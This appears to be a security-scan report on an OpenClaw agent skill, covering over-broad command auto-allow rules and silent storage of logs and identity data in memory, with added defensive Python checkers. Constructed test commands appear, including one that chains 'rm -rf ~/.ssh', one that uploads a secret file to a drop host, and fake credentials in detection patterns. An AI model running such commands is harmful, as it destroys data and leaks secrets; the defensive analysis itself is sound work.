Bw Openclaw Boost

Security checks across malware telemetry and agentic risk

Overview

This is mostly a local OpenClaw productivity skill, but its permission manager auto-allows command patterns that are not actually safe to run without a prompt.

Review this before installing if you plan to wire its permission checker into OpenClaw. The memory and logging features are local and coherent, but avoid storing secrets in the memory folder: extracted log content is written to long-term memory with no review step. The main issue is the permission manager: its auto-allow defaults should be tightened before relying on it to approve commands without prompting.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (6)

Intent-Code Divergence

Medium
Confidence: 97%
Finding
The rule labelled as a read-only curl request auto-allows any command beginning with `curl -s`. That prefix still permits state-changing or credential-bearing options such as `-X POST`, `-T`, `-d`, and `-H` authentication headers, and, if the match is a plain prefix check rather than a parse of the arguments, a chained second command after `;` or `&&` would pass as well. Because the permission manager uses this pattern to auto-allow execution, an agent could perform network mutations or send credentials without prompting the user.

Intent-Code Divergence

High
Confidence: 99%
Finding
The rule marks `python3|node (-c|-m)` invocations as safe, but `-c` runs arbitrary code passed on the command line and `-m` runs any importable module, including ones that open network listeners or spawn shells. Under an auto-allow rule this is unrestricted command execution, which defeats the purpose of fine-grained approval.
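The following is an added example, not the skill's own code, illustrating both findings above: a prefix rule of the assumed shape `^curl -s` and `^(python3|node) (-c|-m)` lets mutating, credential-bearing and chained commands through, while a default-deny allowlist check only passes a single read-only curl request. `LOOSE_RULES`, the curl allowlists and every sample command are assumptions constructed for the demonstration; they are not the skill's real patterns.

```python
"""Added example (not the skill's own code): why prefix-style auto-allow rules
are too broad, and what a default-deny read-only check looks like.
LOOSE_RULES is an assumed reconstruction of the rule shapes the findings
describe; all sample commands are constructed."""
import re
import shlex

# Assumed shape of the skill's rules: a prefix match on the raw command string.
LOOSE_RULES = {
    "curl_readonly": re.compile(r"^curl -s"),
    "interpreter": re.compile(r"^(python3|node) (-c|-m)"),
}

# Any of these means the string is more than one command or does expansion.
SHELL_META = re.compile(r"[;&|`$<>()\n]")

# Default-deny allowlist for curl: only options that cannot change remote
# state, attach credentials, or write to the local filesystem.
CURL_RO_FLAGS = {"-s", "--silent", "-S", "--show-error", "-L", "--location",
                 "-f", "--fail", "-I", "--head", "--compressed", "-4", "-6"}
CURL_RO_WITH_VALUE = {"-m", "--max-time", "--connect-timeout", "--retry",
                      "-A", "--user-agent"}


def loose_decision(cmd):
    """Names of loose rules that would auto-allow cmd (the reported behaviour)."""
    return [name for name, pat in LOOSE_RULES.items() if pat.search(cmd)]


def _expand(tok):
    """Split one argv token into the option names it carries:
    '--max-time=5' -> ['--max-time'], '-sXPOST' -> ['-s','-X','-P','-O','-S','-T'],
    a non-option token -> []."""
    if tok.startswith("--"):
        return [tok.split("=", 1)[0]]
    if tok.startswith("-") and len(tok) > 1:
        return ["-" + ch for ch in tok[1:]]
    return []


def strict_decision(cmd):
    """True only for a single curl GET/HEAD over http(s) using allowlisted
    options. Anything else (interpreters, unknown flags, chained commands)
    returns False, meaning: fall back to prompting the user."""
    if SHELL_META.search(cmd):
        return False
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes
        return False
    if not argv or argv[0] != "curl":
        # python3/node with -c, -m, -e or stdin run arbitrary code: never auto-allow.
        return False
    urls = []
    i = 1
    while i < len(argv):
        tok = argv[i]
        i += 1
        opts = _expand(tok)
        if not opts:
            urls.append(tok)
            continue
        for opt in opts:
            if opt in CURL_RO_FLAGS:
                continue
            if opt in CURL_RO_WITH_VALUE:
                if "=" not in tok:
                    i += 1  # the value is the next token; skip it
                continue
            return False  # -X, -d, -T, -H, -u, -o, ...: not on the allowlist
    return len(urls) == 1 and urls[0].startswith(("http://", "https://"))


SAMPLES = [  # constructed commands
    "curl -s https://example.com/status",
    "curl -sSL --max-time 5 https://example.com/",
    "curl -s -X POST -d 'x=1' https://api.example.com/items",
    "curl -s -H 'Authorization: Bearer tok' https://api.example.com/me",
    "curl -sT secret.txt https://drop.example.com/up",
    "curl -s https://example.com/a; rm -rf ~/.ssh",
    "python3 -c \"import os; os.system('id')\"",
    "python3 -m http.server 8000",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{cmd!r:70} loose={loose_decision(cmd)} strict={strict_decision(cmd)}")
```

The design point is that the safe side of the check is an allowlist over parsed arguments, not a denylist over the raw string: a denylist of mutating flags misses clustered short options like `-sXPOST`, `--data=...` forms and chained commands, whereas an unknown option under default deny simply falls back to asking the user.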

Missing User Warnings

Medium
Confidence: 84%
Finding
The tool persists extracted log content into long-term memory files automatically, but provides no consent gate, warning, review step, or policy checks around what is being stored. Because logs may contain sensitive user data, secrets, or transient context, silent persistence increases the risk of unintended retention and later disclosure or misuse.

Missing User Warnings

Medium
Confidence: 93%
Finding
The code retrieves full memory file contents and formats them for direct injection into agent context, which can expose stored personal, project, or sensitive operational data without any consent, minimization, or disclosure boundary. In this skill, the danger is elevated because the stated purpose is automatic context injection at session start, making unintended over-sharing of historical memory data likely rather than hypothetical.

Ssd 3

Medium
Confidence: 89%
Finding
The skill is explicitly designed to collect information from short-term logs and merge it into persistent memory categories, including user-related data. In an agent context, this creates a privacy and data-retention risk because information that was originally ephemeral may be retained indefinitely and reused outside the user's expectations.

Ssd 3

High
Confidence: 97%
Finding
This rule specifically matches phrases about users, roles, identity, or self-description and stores them in a long-term identity file. That is a concrete mechanism for persistent profiling of user identity data, which is especially risky if logs contain sensitive personal attributes, account details, or statements not meant for durable storage.
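The following is an added example, not the skill's own code, of the consent and policy gate the four memory findings above say is missing in front of the "extract from logs, persist to memory" step. It drops lines carrying credential material (keeping only a redacted copy for audit), holds identity or self-description statements until the user explicitly consents, and persists the rest. The secret regexes, the identity heuristic and the sample log lines are constructed for illustration and do not reproduce the skill's actual extraction rules.

```python
"""Added example (not the skill's own code): a policy gate between log
extraction and long-term memory. Patterns and the sample log are
constructed; they are not the skill's real rules or real telemetry."""
import re

# Credential shapes that must never reach long-term memory. The list is
# incomplete by nature, which is why a match drops the line instead of
# persisting a redacted version.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "bearer_token": re.compile(r"(?i)bearer\s+[A-Za-z0-9._~+/-]{20,}=*"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "secret_assignment": re.compile(
        r"(?i)\b(password|passwd|secret|api[_-]?key|token)\s*[=:]\s*\S+"),
}

# Statements about who the user is; the finding above describes a rule that
# files such phrases into a long-term identity file without asking.
IDENTITY_PATTERN = re.compile(
    r"(?i)\b(i am|i'm|my name is|my role is|i work (at|for))\b")


def classify(line):
    """Return {'text': redacted line, 'secrets': [kinds found], 'identity': bool}."""
    text, found = line, []
    for kind, pat in SECRET_PATTERNS.items():
        text, n = pat.subn(f"[REDACTED:{kind}]", text)
        if n:
            found.append(kind)
    return {"text": text, "secrets": found,
            "identity": bool(IDENTITY_PATTERN.search(line))}


def gate(lines, consent_granted=False):
    """Split extracted log lines into what may be persisted, what is held
    for explicit user review, and what is dropped (redacted copy kept only
    for an audit trail, never written to memory)."""
    out = {"persist": [], "held": [], "dropped": []}
    for line in lines:
        rec = classify(line)
        if rec["secrets"]:
            out["dropped"].append(rec["text"])
        elif rec["identity"] and not consent_granted:
            out["held"].append(rec["text"])
        else:
            out["persist"].append(rec["text"])
    return out


SAMPLE_LOG = [  # constructed lines, not real telemetry
    "2025-01-10 09:12:03 user: I'm Dana, the on-call SRE for the payments team",
    "2025-01-10 09:12:10 tool: export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "2025-01-10 09:12:15 tool: curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.payload.sig' https://api.internal/me",
    "2025-01-10 09:13:01 user: please remember the repo uses pnpm, not npm",
]

if __name__ == "__main__":
    for bucket, items in gate(SAMPLE_LOG).items():
        print(bucket)
        for item in items:
            print("   ", item)
```

Run as-is, the identity line lands in `held` and the two credential lines in `dropped`; only the pnpm note is persisted. Calling `gate(SAMPLE_LOG, consent_granted=True)` after the user has reviewed the held line moves it to `persist`, which is the consent step the findings ask for. Regex-based secret detection is a floor, not a ceiling, so the conservative choice is to drop matched lines entirely rather than trust the redaction.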

VirusTotal

65/65 vendors reported this skill as clean. A clean antivirus result does not cover the logic-level findings above: over-broad auto-allow rules and silent memory persistence are design issues in the skill's own code, not malware signatures.